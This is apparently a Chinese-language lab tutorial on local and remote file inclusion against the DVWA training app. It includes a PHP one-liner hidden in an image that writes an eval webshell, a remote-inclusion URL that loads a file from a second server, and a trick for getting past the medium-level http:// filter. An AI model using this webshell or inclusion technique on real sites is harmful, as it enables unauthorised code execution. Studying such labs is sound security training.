文件包含漏洞原理
文件包含本身是正常的,而文件包含漏洞是对文件代码没有检测,包含漏洞就相当于调用了一个库,图片本身没有木马代码,但图片包含一句话编码,在打开图片的时候编码执行并生成webshell的木马文件,图片只是作为一个木马文件上传的媒介。
文件包含有两种
一种是本地包含(LFI):指的是上传的正常文件和木马文件是等同关系,他们都是放在一起的,都在这个同一个本地服务器上,只不过上传文件拥有调用木马功能,本地文件上传是我们找到文件路径上传的。
如同:http://192.168.133.129/dvwa/vulnerabilities/fi/index.php?page=l.php
其中,index.php和l.php是归属同一个本地服务器的。
另一种是远程文件包含(RFI):指的是有另一台机器web sever,它的网站主目录下有木马文件,远程文件包含是服务器主动访问你上传的文件。
如同:
http://192.168.133.129/dvwa/vulnerabilities/fi/index.php?page=http://web_sever/l.php
很显然,他们属于不同服务器
Low级别文件包含漏洞实验
本地文件包含步骤:
- 首先,我们制作一句话图片木马 ,木马内容如下
<?fputs(fopen("shell2.php","w"),'<?php eval($_POST[haoye]);?>')?>
# 图片生成一个名为shell2.php的木马
我们找一张图片,通过edjpg.com这个软件编辑这张图片,把这一段编码编辑进去。
注意:图片不要太大,太大上传不了。
2. 把图片上传到靶机DVWA中的Upload上,复制图片上传的路径,在File inclusion的页面的URL栏中“page=”后面添加图片的路径,回车可以看到页面乱码出现,说明木马生成。
3. 打开xshell连接靶机,检查upload和File inclusion是否都成功了
root@owaspbwa:~# cd /var/www/dvwa/hackable/uploads/
root@owaspbwa:/var/www/dvwa/hackable/uploads# ls
shell.php tu.jpg.jpg
#tu.jpg.jpg是我们上传的图片
root@owaspbwa:/var/www/dvwa/hackable/uploads# cd /var/www/dvwa/vulnerabilities/fi/
# /dvwa/vulnerabilities/fi/可以从文件包含页面的URL栏中得知
root@owaspbwa:/var/www/dvwa/vulnerabilities/fi# ls
c.php help include.php index.php l.text shell2.php source
# shell2.php就是一句话代码执行的结果生成的木马文件
root@owaspbwa:/var/www/dvwa/vulnerabilities/fi# cat shell2.php
<?php eval($_POST[haoye]);?>root@owaspbwa:/var/www/dvwa/vulnerabilities/fi#
# cat 用于查看shell2.php文件的内容
- 打开中国蚁剑查询shell2.php是否可编辑,可删除,成功操作的话说明文件包含成功。
远程文件包含操作
- 建立远程连接的服务器,我们可以用kali linux服务器,启动apache
- 登录apache页面
- 接下来要做的就是在这个服务器上放一个可以最终生成木马的文件,建立的目录:/var/www/html,文件名haoye.txt
- 检测这个文件是否能用
- 将文件包含换成远程路径
回车不会显示乱码,因为它是一个txt文件 - 然后,在xshell中检测是否生成
- 用中国蚁剑检验是否可编辑,可删除之类的,和上面本地包含的一样
Medium级别的文件包含实验
在这里,本地文件包含和low级别的一样,都能上传
但是,远程文件包含有了一定的限制
打开文件包含的页面,view source查看源代码
文件包含时,URL栏中有http://但不起作用了就没法访问到文件
解决办法
你可以把第二个http://随意穿插拼接进去,使得类似看作连串的http://删除后还能显示http://,这样就可以远程包含了。
High级别的文件包含实验
还是照样view source查看源码
这里的限制就太死了,就没法做了。